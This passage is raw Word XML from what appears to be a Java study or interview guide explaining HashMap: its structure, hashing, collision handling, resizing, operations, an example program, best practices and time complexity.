          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Map interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and allows you to store </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key-value pairs</w:t>
      </w:r>
      <w:r w:rsidR="007B1875" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and allows efficient retrieval, insertion, and deletion operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A207ECD"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AD5A8F"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B125C68" w14:textId="05CD4649"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7F74D803" w14:textId="77777777" w:rsidR="00A92E95" w:rsidRPr="00CE4B95" w:rsidRDefault="00A92E95" w:rsidP="00A92E95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9FF2F8" w14:textId="77777777" w:rsidR="000664C7" w:rsidRPr="00CE4B95" w:rsidRDefault="000664C7" w:rsidP="000664C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3538B9E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Map Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HashMap implements the java.util.Map interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C41D53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Stores data as key-value pairs (like a dictionary).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649EC067"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Doesn't allow duplicate keys (each key maps to exactly one value).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39482C8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mits Null Values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows one null key and multiple null values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E1DDB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Not synchronized by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14045E33"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Doesn't guarantee any specific order of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069E8965"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Automatically resizes when the number of elements exceeds a threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D72A8E7" w14:textId="77777777" w:rsidR="000664C7" w:rsidRPr="00CE4B95" w:rsidRDefault="000664C7" w:rsidP="00A92E95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE8221F" w14:textId="193A6199"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Data Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D720456" w14:textId="77777777" w:rsidR="00194921" w:rsidRPr="00CE4B95" w:rsidRDefault="00194921" w:rsidP="00194921">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Map is an array of Node&lt;K,V&gt;, called a bucket array:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55599B5D" w14:textId="6FEC0CA5"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table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1606CB20" w14:textId="77777777" w:rsidR="00194921" w:rsidRPr="00CE4B95" w:rsidRDefault="00194921" w:rsidP="00194921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F182A7E" w14:textId="77777777" w:rsidR="00194921" w:rsidRPr="00CE4B95" w:rsidRDefault="00194921" w:rsidP="00194921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148D9E38"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arameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FB8850"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The number of buckets when the HashMap is created (default is 16).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A920DB"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oad Factor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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577B4CCD"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Default capacity (16) and load factor (0.75)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303E3F52"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float loadFactor): Both specified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F7DEDF"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Map&lt;? extends K, ? extends V&gt; m): Creates from another map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7564DF4E" w14:textId="77777777" w:rsidR="00194921" w:rsidRPr="00CE4B95" w:rsidRDefault="00194921" w:rsidP="00194921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3135ED4A" w14:textId="6D23118A"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ach node stores:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFC4765"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F4BD1F2"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC20C40"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K key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015CDD34"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V </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629EC15F"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x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linked list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD06FE4" w14:textId="1826E166"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF7DCCA" w14:textId="77777777" w:rsidR="00A92E95" w:rsidRPr="00CE4B95" w:rsidRDefault="00A92E95" w:rsidP="00E37BA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2140B6" w14:textId="36D9D5C7" w:rsidR="00FE789E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE789E" w:rsidP="00FE789E">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ing and Index Calculation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BC5C36" w14:textId="77777777" w:rsidR="00FE789E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE789E" w:rsidP="00FE789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map.put(key, value):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341223FC"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called on the key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F3EB84"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dex is computed as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A01BE3E" w14:textId="65DE5A49" w:rsidR="00FE789E" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">index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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// where n is array length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A16C5F"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 is stored in the bucket at that index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215BF201" w14:textId="77777777" w:rsidR="00B50B7A" w:rsidRPr="00CE4B95" w:rsidRDefault="00B50B7A" w:rsidP="00B50B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C01A619" w14:textId="2AF0CCDC" w:rsidR="00D33622" w:rsidRPr="00CE4B95" w:rsidRDefault="00D33622" w:rsidP="00B50B7A">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ision Handling</w:t>
      </w:r>
      <w:r w:rsidR="00EF376A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564DC8E0"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ision occurs when two keys hash to the same index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705B48CA" w14:textId="77777777" w:rsidR="00B50B7A"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 uses Linked List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46433A04" w14:textId="277FE405" w:rsidR="00D33622"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 of collision:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F469B4B" w14:textId="77777777" w:rsidR="00B50B7A"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node is appended to the list/tree.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73010C37" w14:textId="6E4BDC12" w:rsidR="00D33622"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ring retrieval, equals() is used to find the right key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005864E7" w14:textId="77777777" w:rsidR="00A92E95" w:rsidRPr="00CE4B95" w:rsidRDefault="00A92E95" w:rsidP="00E37BA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="689501D1" w14:textId="77777777" w:rsidR="00351A5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00351A5D" w:rsidP="00351A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hashing (Resizing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252DEAE8"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 factor (default 16 * 0.75 = 12), HashMap resizes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17116EA5"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array is double in size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABE8A3C" w14:textId="55A431A5"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existing entries are rehashed and moved to new buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184E7D3B" w14:textId="1959B1E0"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1627084B" w14:textId="2109A688"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Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7275E023"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 Associates the specified value with the specified key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F249614"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 Returns the value to which the specified key is mapped</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299E3E61"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 Removes the mapping for the specified key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CBE32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 Returns the number of key-value mappings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2FA8F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Empty(): Returns true if this map contains no key-value mappings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68722DE0"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 Removes all mappings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F56C6E8" w14:textId="0A46862D"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lk Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F19BEFF"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et(): Returns a Set view of the keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60400FB7"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s(): Returns a Collection view of the values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A7BDAB"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Set(): Returns a Set view of the mappings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671D34B3" w14:textId="77777777" w:rsidR="00072187" w:rsidRPr="00CE4B95" w:rsidRDefault="00072187" w:rsidP="00A556DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57B38C7E" w14:textId="7CE1378E" w:rsidR="00E37BA4" w:rsidRPr="00CE4B95" w:rsidRDefault="00A556DC" w:rsidP="00A556DC">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DF8B12"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lastRenderedPageBreak/>
        <w:t>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75E6FC77"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397053A6"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2545C8DE"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0137C405"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5907A1" w14:textId="1A95BC0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B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F221B9" w14:textId="77777777" w:rsidR="00A556DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A556DC" w:rsidP="00E37BA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="348CA656" w14:textId="220E188D" w:rsidR="00BB01C4" w:rsidRPr="00CE4B95" w:rsidRDefault="00BB01C4" w:rsidP="00BB01C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4B348151" w14:textId="3EBD6030" w:rsidR="001D2084" w:rsidRPr="00CE4B95"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color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>import java.util.HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EEC941" w14:textId="07A11F25"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AB9F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1F39F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reate a HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F00A50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46C802FD"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227910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dd elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F2BF2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759D568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300D4B7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0914E69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1DE872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elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F365F1"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 cou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0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249A9DA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A9FDF7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heck if key exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424DE952"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ontains Banan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ontains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rue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FCD4F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1B83E4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Remove element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEE303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remov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p>
    <w:p w14:paraId="25BDA03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fter removal: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pple=10, Banana=20}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B7B10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00F0D9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terate through HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8A498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33A5CC"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186C5DDA"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59266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722E55B"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sing entrySet() for iteration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C5A6C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ent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9C0E8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g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Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E598D9"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D258DD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A7406D3" w14:textId="5914DC08"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B1D2B6" w14:textId="77777777" w:rsidR="00BB01C4" w:rsidRPr="00CE4B95" w:rsidRDefault="00BB01C4" w:rsidP="00E37BA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF11608" w14:textId="77777777" w:rsidR="00555B5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00555B5D" w:rsidP="00555B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HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE6E6C7"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access to elements by key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B305122"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nsertion and retrieval operations are frequent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A57479"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n't need to maintain insertion order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301AC48C" w14:textId="293BBD32" w:rsidR="00555B5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00555B5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>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When thread safety is not a requirement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E0AD8E" w14:textId="5FE51AB0" w:rsidR="000A12F0" w:rsidRPr="00CE4B95" w:rsidRDefault="000A12F0" w:rsidP="000A12F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st Practices</w:t>
      </w:r>
      <w:r w:rsidR="007D17C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6EE42C"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oos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wisely if you expect large volume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB67204" w14:textId="0361E37F" w:rsidR="0026300C" w:rsidRPr="00CE4B95" w:rsidRDefault="0026300C">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mmutable objects as keys to prevent unexpected behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58343FAE"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tainsKey()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> before using get() to avoid null confusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2F2BEC"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 equals() and hashCode() properly for custom key objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B4EC74"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ConcurrentHashMap for multi-threaded environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F48E5B2" w14:textId="77777777" w:rsidR="005627B3" w:rsidRPr="00CE4B95" w:rsidRDefault="005627B3" w:rsidP="005627B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9EC4B7" w14:textId="77777777" w:rsidR="005627B3" w:rsidRPr="00CE4B95" w:rsidRDefault="005627B3" w:rsidP="005627B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0130886A" w14:textId="566AAD2D" w:rsidR="005C6420" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6420" w:rsidP="005C642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World Use Cases</w:t>
      </w:r>
      <w:r w:rsidR="007D17C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEDFEE2"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aching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E57FCAA"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ing data for quick lookups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408505E3"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ing frequencies (e.g., word count)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3FA051"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IDs to entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F301AD7" w14:textId="77777777" w:rsidR="00544C1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00544C1B" w:rsidP="00544C1B">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Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63828226"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erage Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C7C6B2"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1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E5AC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1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468E56E5"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1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA862A9"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 O(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDDD493"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st Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> (if all keys collide):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C30C374"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log n) in Java 8+ (due to tree conversion), O(n) before Java 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C6E786"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log n) in Java 8+, O(n) before Java 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AACC3D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log n) in Java 8+, O(n) before Java 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A8D10A" w14:textId="3900C588" w:rsidR="00324AE3" w:rsidRPr="00CE4B95"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09" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF3B9D2" w14:textId="77777777" w:rsidR="00DB0308" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB0308" w:rsidP="00DB0308">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2426D0D2"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66" w:name="_Toc197867380"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain internal working of HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="166"/>
    </w:p>
    <w:p w14:paraId="520E778F" w14:textId="4E2CD90D" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F" w:rsidP="00C650C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Map stores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using a technique called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It offer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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="728A439A"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Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20403DD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18E6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7A115783"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K key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06574916"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5D9B7448"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handling collisions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DACEB6" w14:textId="05424918"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F834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maintains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CB0757"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 of Node&lt;K, V&gt;[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> called table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE56D52"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ch Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E703A06"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put(key, value) Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226EC0F0"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w:t>
      </w:r>
    </w:p>
